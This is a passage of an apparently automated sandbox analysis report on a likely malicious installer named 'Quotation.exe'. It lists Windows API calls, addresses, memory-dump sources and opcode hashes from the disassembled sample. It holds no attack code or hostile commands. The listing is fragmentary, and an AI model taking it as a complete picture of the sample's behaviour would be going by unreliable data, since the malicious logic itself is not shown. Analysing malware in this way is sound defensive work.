                                                                                    • Opcode ID: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
                                                                                    • Instruction ID: 15b31486c92c371a01b824ec8c308dd00c5fb3f6de234e3455dc008c55755f60
                                                                                    • Opcode Fuzzy Hash: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
                                                                                    • Instruction Fuzzy Hash: 2A01D472E542309BD7196F28AC09B2A2699A7C1711F15893EF901F72F1E6B89D01879C
                                                                                    APIs
                                                                                      • Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05
                                                                                      • Part of subcall function 00406BA3: CharNextW.USER32(?,?,?,00000000,007A4288,0040662D,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 00406BB2
                                                                                      • Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BB7
                                                                                      • Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BD1
                                                                                      • Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
                                                                                      • Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
                                                                                      • Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
                                                                                      • Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC
                                                                                    • lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 0040666A
                                                                                    • GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B
                                                                                      • Part of subcall function 004065AD: FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
                                                                                      • Part of subcall function 004065AD: FindClose.KERNEL32(00000000), ref: 004065C4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 1879705256-0
                                                                                    • Opcode ID: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
                                                                                    • Instruction ID: a0caebe489df7e9b8c47fc78556c087e467958ed1b806a88a2837ae242d5d264
                                                                                    • Opcode Fuzzy Hash: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
                                                                                    • Instruction Fuzzy Hash: FAF0C2614042212AC72037751E88A2B255C8E4635971B4F3FFCA7F12D2CA7ECC31957D
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A3A40,?), ref: 004066DD
                                                                                    • CloseHandle.KERNEL32(?), ref: 004066EA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateHandleProcess
                                                                                    • String ID:
                                                                                    • API String ID: 3712363035-0
                                                                                    • Opcode ID: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
                                                                                    • Instruction ID: 38b84478e037bba77e5bda8d52abba300c1c8c141792dec0b9fd1b8b871a7deb
                                                                                    • Opcode Fuzzy Hash: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
                                                                                    • Instruction Fuzzy Hash: 45E0BFF0600219BFFB009F64ED05E7BB66CFB44604F008529BD51E6150D77499149A79
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000), ref: 0040691D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCreate
                                                                                    • String ID:
                                                                                    • API String ID: 415043291-0
                                                                                    • Opcode ID: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                                                                    • Instruction ID: 2b20bdeb62c6161fa823f395ef17c7eb789f23499ed64d7ea8bf83f44df62fc9
                                                                                    • Opcode Fuzzy Hash: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                                                                    • Instruction Fuzzy Hash: 3ED09E71118201AEDF054F20DE4AF1EBA65EF84710F114A2CF6A6D40F0DA718865AA15
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1996808927.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1996786623.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996880927.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996906021.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_70020000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: f9283a66d2fad058b0aa10273f739c2b47a7375dcd5dc0b10ab366d8ce0cddd3
                                                                                    • Instruction ID: bbb94ea985d37248bf57638408fdaa933b7129883741cf30f4bbc18622189d34
                                                                                    • Opcode Fuzzy Hash: f9283a66d2fad058b0aa10273f739c2b47a7375dcd5dc0b10ab366d8ce0cddd3
                                                                                    • Instruction Fuzzy Hash: 57419176800204AFEB109FA1EDC6B8D37B6EB54B37F30446AE504DA262D734A5429AC9
                                                                                    APIs
                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00793200,00403326,?,00793200,?,00793200,?,?), ref: 00406A00
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    • Opcode ID: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                                                                    • Instruction ID: af586fd2f7f6880044e5fe5766d6096d47c0719768b2310f5fb2dcc6f4abfd7b
                                                                                    • Opcode Fuzzy Hash: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                                                                    • Instruction Fuzzy Hash: 68E0BF32600119BB8F205B56DD04D9FBF6DEE927A07124026F906B6150D670EA51DAE4
                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00000000,004031A2,?,00000004,00000000,00000000,00000000,00000000), ref: 0040693D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                                                                    • Instruction ID: de6cc0abbc936f950c0aa48064430f9d9b1dfb465831d1c2e6fd43c94deb3c7e
                                                                                    • Opcode Fuzzy Hash: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                                                                    • Instruction Fuzzy Hash: B7E0BF72200119BB8F215F46DD04D9FBF6DEE956A07114026B905A6150D670EA11D6E4
                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(7002501C,00000004,00000040,70025034), ref: 70021A68
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1996808927.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1996786623.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996880927.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996906021.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_70020000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: 9d5a371224f8d692970f8e46aec4d56ca0667546dec059c43661fe9bd4619a4c
                                                                                    • Instruction ID: e752745b4308cea9c87d4b3da0d9a8f21f5db5326b0bd8f7532dd6f20b304af4
                                                                                    • Opcode Fuzzy Hash: 9d5a371224f8d692970f8e46aec4d56ca0667546dec059c43661fe9bd4619a4c
                                                                                    • Instruction Fuzzy Hash: 9AF0A272919740EEE3148F1AACC87093AE0B718777F30856EF64DDA362C3704102AB9E
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00406983,?,?,?,?,Call,00000000,00000000), ref: 004062DA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Open
                                                                                    • String ID:
                                                                                    • API String ID: 71445658-0
                                                                                    • Opcode ID: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                                                                    • Instruction ID: 8275c49ac47c74d38988e0f8258bf7c149b7cc7998a497f72a9ef83b4f38b8ad
                                                                                    • Opcode Fuzzy Hash: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                                                                    • Instruction Fuzzy Hash: 51D0123204020DBBDF11AF90DD01FAB372DAB08750F01443AFE16A40A0D775D531A718
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
                                                                                    • Instruction ID: ded955796c7b3a29419b03b8f07dbed72bf973f4b2991851ad7e5473cbc7331c
                                                                                    • Opcode Fuzzy Hash: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
                                                                                    • Instruction Fuzzy Hash: C3C04C716446007ADA109B619E05F077759A791701F10C8297240E55E0C675E460CA2C
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000028,?,?,00405316), ref: 004054EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
                                                                                    • Instruction ID: 87925707e6409367d6b01bd6df3e013852da7cf14c64ffa79ed0cacb9bd9d926
                                                                                    • Opcode Fuzzy Hash: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
                                                                                    • Instruction Fuzzy Hash: 28B09239684600AADA195B00EE09F467B62ABA4701F008428B240640B0CAB210A0DB18
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    • Opcode ID: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                                                                    • Instruction ID: 249934cc5d2069a5a678a88893d20fb7c04287045258dfdbdab4020963f10c22
                                                                                    • Opcode Fuzzy Hash: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                                                                    • Instruction Fuzzy Hash: 94B09231140200AADA214F009E0AF057B21AB90700F108434B290680F086711060EA0D
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNELBASE(00000040,?,700211C4,-000000A0), ref: 70021302
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1996808927.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1996786623.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996880927.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996906021.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_70020000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocGlobal
                                                                                    • String ID:
                                                                                    • API String ID: 3761449716-0
                                                                                    • Opcode ID: 1fa8008312811d2e097c1057552e11591f2a39d55fd7b351527a2dd34a631a07
                                                                                    • Instruction ID: 1cc576f73056ce86a65e4eb34b2c2cfb32e86ee0fc4ffdd19389ac8c4d345c5a
                                                                                    • Opcode Fuzzy Hash: 1fa8008312811d2e097c1057552e11591f2a39d55fd7b351527a2dd34a631a07
                                                                                    • Instruction Fuzzy Hash: 58B002B26401005FFE409755DD9AF353654F740715F741050F705D5152D57458518959
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,0040623C,?,?), ref: 0040631F
                                                                                    • GetShortPathNameW.KERNEL32(?,007A5688,00000400), ref: 00406328
                                                                                    • GetShortPathNameW.KERNEL32(?,007A4E88,00000400), ref: 00406345
                                                                                    • wsprintfA.USER32 ref: 00406363
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,007A4E88,C0000000,00000004,007A4E88,?), ref: 0040639B
